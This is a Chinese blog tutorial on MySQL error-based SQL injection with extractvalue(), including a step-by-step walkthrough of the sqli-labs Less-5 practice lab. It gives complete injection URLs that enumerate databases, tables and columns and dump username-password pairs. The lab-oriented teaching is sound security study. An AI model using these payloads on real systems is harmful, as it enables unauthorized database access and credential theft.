extractvalue报错注入理论及实战

已于 2023-11-21 22:21:17 修改
阅读量593 收藏 7
点赞数 2
分类专栏: 网络安全 文章标签: 数据库
于 2023-11-07 15:37:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45988710/article/details/134268832
版权

报错注入

什么是报错注入

构造语句,让错误信息中夹杂可以显示数据库内容的查询语句,返回报错提示中包括数据库中的内容

如上图所示,通过group by的报错,我们可以知道列数是多少

输入正确的查询数据库的SQL语句,虽然可以执行成功,但是页面不显示数据库的名称

我们故意将database写为databasa,此时数据库的名称security在报错信息中显示了出来

因此可以利用报错的信息得到我们想要的信息。

1.通过floor()报错注入

2.通过extractvalue()报错注入

3.通过updatexml()报错注入

通过extractvalue()报错注入

extractvalue包含两个参数,第一个参数XML文档对象名称,第二个参数 路径

select extractvalue(doc,'/book/author/surname') from xml;

把查询参数格式符号写错

select extractvalue(doc,'`book/title') from xml;

可以看到'~book/title'在报错的时候是可以回显出来的,如果将这个地方换成SQL语句,他也会将结果以报错的形式反馈出来。

select extractvalue(doc,concat(0x7e,(select database()))) from xml;

错误提示成功报错出我们要查询的内容

extractvalue(1,2)//两个参数

concat(1,2)//两个参数

(select database())//要把命令写到括号里面,之后可以直接使用替换括号内容的方式进行查询。黄色括号里面

报错注入:一次只能返回32个字符问题,解决此问题可以使用substring函数

substring(1,2,3)三个参数,第一个参数是内容,第二个参数是要从第几个开始截取,第三个参数是要截取多少个

?id=1' and 1=extractvalue(1,concat(0x73,(select substring(group_concat(username,'-',password),25,30)from users))) --+

1.数据库 security
2.数据库 http://sqli-labs:8088/Less-5/?id=1' union select extractvalue (1,concat(0x7e,(select database())))  --+ 
3.数据表 http://sqli-labs:8088/Less-5/?id=1' union select 1,2,extractvalue (1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')))  --+ 
4.数据段 http://sqli-labs:8088/Less-5/?id=1' union select 1,2,extractvalue (1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))  --+ 
5.查询内容 http://sqli-labs:8088/Less-5/?id=1' union select 1,2,extractvalue (1,concat(0x7e,(select group_concat(username,'-',password) from security.users)))  --+ 
6.截取内容 http://sqli-labs:8088/Less-5/?id=1' union select 1,2,extractvalue (1,concat(0x7e,(select substring(group_concat(username,'-',password),30,60) from security.users)))  --+
本次注入sqli-labs靶场的Less-5

首先按照页面提示,get请求拼接?id=1尝试,发现页面显示You are in......... 页面可以正常显示

按照我们注入的顺序,第一步先去分析是字符型还是数字型,如果是字符型要弄清楚闭合方式是什么,我们随便丢一个单引号尝试。根据报错提示,可以看出是字符型注入而且闭合方式是单引号

下一步去判断列数,使用order by函数。列数为3时可以正常显示,由此判定列数为3

构造SQL语句,查询数据库信息,查看回显内容位置,发现命令执行成功,但是页面没有回显内容。

直接尝试报错注入,使用extractvalue函数。构造SQL语句

http://sqli-labs:8088/Less-5/?id=1'union select 1,2,extractvalue(1,'~adb') --+

可以看到报错回显了内容信息,可以使用报错注入。

先查数据库,构造SQL语句

http://sqli-labs:8088/Less-5/?id=1'union select 1,2,extractvalue(1,concat(0x7e,(select database()))) --+

拿到了数据库名称security

紧接着查询数据表,构造SQL语句

http://sqli-labs:8088/Less-5/?id=1'union select 1,2,extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'))) --+

得到数据表 users,根据经验可以猜出账号与密码都在这个表里面

查询数据表里面的字段,构造SQL语句

http://sqli-labs:8088/Less-5/?id=1'union select 1,2,extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))) --+

拿到字段:id,username,password

都到这一步了,直接查询username,password这两个字段里面的信息,构造SQL语句

http://sqli-labs:8088/Less-5/?id=1'union select 1,2,extractvalue(1,concat(0x7e,(select group_concat(username,'-',password) from security.users))) --+

得到了内容,但是显示的不完整,这是因为报错注入一次只能返回32个字符,直接使用substring函数帮助我们

http://sqli-labs:8088/Less-5/?id=1'union select 1,2,extractvalue(1,concat(0x7e,(select substring(group_concat(username,'-',password),30,30) from security.users))) --+

注入完成!

孙其龙
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
MYSQL updatexml()函数报错注入解析
09-09
主要介绍了MYSQL updatexml()函数报错注入解析,并且简单介绍了updatexml函数,具有一定参考价值,需要的朋友可以了解下。
学习基于extractvalue()和updatexml()的报错注入
热门推荐
超人学飞的日子
06-09 5万+
extractvalue()extractvalue() :对XML文档进行查询的函数其实就是相当于我们熟悉的HTML文件中用 <div><p><a>标签查找元素一样语法:extractvalue(目标xml文档,xml路径)第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报...
SQL注入——基于报错的注入【extractvalue()】篇
最新发布
2301_76437855的博客
03-31 292
这种格式,如果写入其他格式就会报错,并且会返回写入的非法格式内容,错误信息如:XPATH syntax error:'xxxxxxxx’。:extractvalue() 函数所能显示的错误信息最大长度为32,如果错误信息超过了最大长度,有可能导致显示不全。基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。常用的报错功能函数包括extractvalue()、updatexml()、floor()、exp()等。
SQL报错型注入原理-详细讲解 extractvalue()、updatexml()、floor() 的报错原因
大大大蜜蜂的博客
10-12 4702
SQL报错型注入原理 一、xpath语法格式错误的报错: mysql5.1.5版本中添加了extractvalue()、updatexml()函数,它们两个分别能够对XML文档进行查询、修改操作,下面分别对这两个函数进行介绍。 这里是MYSQL对extractvalue()和updatexml()的官方介绍 1、extractvalue(xml_frag, xpath_expr):从一个使用xpath语法的xml字符串中提取一个值。 xml_frag:xml文档对象的名称,是一个string类型。 xpat
SQL注入——extractValue()报错注入
heyingcheng的博客
03-06 2119
在实际的注入过程中,查询的列(比如本例中的doc)是不用管的,随便写就可以。因为我们关注的是后面查询的更重要的东西(database)于是我们想到,如果在报错之前执行一下select语句,然后在报错提醒信息那里回显出我们想要的数据信息就好了,这就是报错注入。这条命令的意思是,想要显示的内容123456,这句话的意思是从第一个字符开始显示,显示后面的三个,即123。同理,从第31个字符开始显示,显示后面的30个字符。比如在本例中把查询参数的路径写错,页面上只会显示查询不到内容,但是不会报错。
sql注入中报错注入函数extractvalue和updatexml函数的原理及使用
weixin_46145442的博客
11-28 6065
故意拼接两个函数错误的Xpath字符串,使其报错并返回payload执行结果。
SQL注入-报错注入
LJH1999ZN的博客
02-09 9656
sql注入之报错注入的演示与介绍
MrWQ#vulnerability-paper#SQL 注入基础 (报错注入及延时注入)1
07-25
1、判断是否存在报错 2、group by 虚拟表主键重复冲突 3、extractvalue() 函数 4、updatexml() 函数 1、判断字符注入 2、
SQL注入 报错(updatexml与extractvalue函数介绍)-01
09-15
SQL注入 报错(updatexml与extractvalue函数介绍)-01
MySql读写Xml两种方式性能比较
06-21
MySql通过存储过程读写Xml两种方式性能比较。使用ExtractValue
oracle xml函数使用例子1
02-01
WHERE METADATA_ID=100000311009 and extractValue(value(t),'/chapter/id') = '10001' SELECT extract(value(t),'/column').getstringval() ChapterName FROM t_content_metadata,TABLE( xmlsequence ( extract...
【sql注入-报错注入1】extractvalue()函数 报错注入
07-10 3048
报错注入extractvalue()函数的使用
【SQL注入-extractvalue报错注入
weixin_52613207的博客
06-11 419
出现报错注入的原因:报错注入是一种页面的响应形式,用户在前台页面输入检索内容,后台将前台页面上输入的检索内容无加区别地拼接成sql语句,送给数据库执行,数据库将执行结果返回给后台,后台将数据结果无加区别地显示到前台的页面上,简而言之就是后台对于输入输出的合理性没有检查。什么是报错注入:构造语句,让错误信息中夹杂可以显示数据库内容的查询语句什么时候使用报错注入:查询无回显位的时候,使用报错注入(如图)
基于联合查询的字符型GET注入
Z_l123的博客
02-16 980
1.访问SQLi-Labs网站 访问Less-1,并根据网页提示给定一个GET参数 http://127.0.0.1/sqli-labs/Less-1/?id=1 2.寻找注入点 分别使用以下3条payload寻找注入点及判断注入点的类型: http://127.0.0.1/sqli-labs/Less-1/?id=1' 运行后报错! http://127.0.0.1/sqli-labs/Less-1/?id=1' and '1'='1 运行后正常显示! http:/.
2021-01-18
weixin_45642610的博客
01-18 359
来到sql注入骚姿势,我们一点一点开始学 我们来到这道题,然后尝试注入,结果发现 拼接’or ‘1’='1 'or ‘1’='2如果是字符型注入则会报错,然而并没有而是显示的页面一样, 通过常规注入,回显的页面都是 最后,我们发现这道题是xpath报错注入,函数注入 extractvalue() extractvalue() :对XML文档进行查询的函数 语法:extractvalue(目标xml文档,xml路径) 第一个参数 : 第一个参数可以传入目标xml文档 第二个参数: xml中的位置是可操作
sql盲注_extractvalue报错注入
sugar_by的博客
06-02 952
什么是报错注入 这是一种页面响应形式,响应过程如下: 用户1在前台页面输入检索内容------>后台将前台页面上输入的检索内容无加区别的拼成sql语句,送到数据库执行------->数据库将执行的结果无加区别的显示到前台页面上 俩个“无加区别”后台对输入输出的合理性没有做检查 也就是说输入进去的内容和输出的内容不做检查的 那什么时候用报错注入呢? 构造语句,让错误信息中夹杂可以显示数据库内容的查询语句 返回报错提示中包含数据库中的内容 命令对但是不回显 但是报错是......
SQL注入——基于报错的注入(1)
qq_52072846的博客
02-18 2476
实验目的 熟悉报错功能函数extractvalue的用法,掌握基于报错的SQL注入基本流程 实验原理 (1)关于报错注入 基干报错的注入,是指通讨构造特定的SOI语句,让攻击者想要查询的信息(如 数据库名、版本号、用户名等)通过页面的错误提示回显出来。 报错注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库报错函 数,对于一些SQL语句的错误直接回显在页面上:(2)后台未对一些具有报错 功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、updatexml(、fl
Oracle中对XMLType的简单操作(extractextractvalue
fengzhongdeluoyea的博客
09-01 2658
前几天一直在做Oracle对XMLType字段的操作,我还不是Oracle大拿,到网上找了很多资料,但是很多就是单一功能的介绍,不能很好的解决问题,现在在这里总结下。 1、下面先创建一个名未test.xml的配置文件。 <?xml version="1.0" encoding="UTF-8" ?> <collection xmlns=""> <record> <leader>-----nam0-22-----^
SQL注入,xpath函数updatexml()和extractvalue()报错注入原理
金 帛的博客
04-26 3241
SQL注入之报错注入原理
extractvalue报错注入需要猜解字段吗
05-30
是的,使用 extractvalue 函数进行注入时,需要先猜解出目标数据库中的字段名和表名,才能进行注入。因为 extractvalue 函数需要指定要查询的字段名和表名,如果不知道这些信息,无法进行有效的注入。因此,常见的 SQL 注入攻击手段之一是通过一些技巧来猜解出目标数据库中的表和字段信息,例如使用 union 查询、错误信息提示等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

孙其龙

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值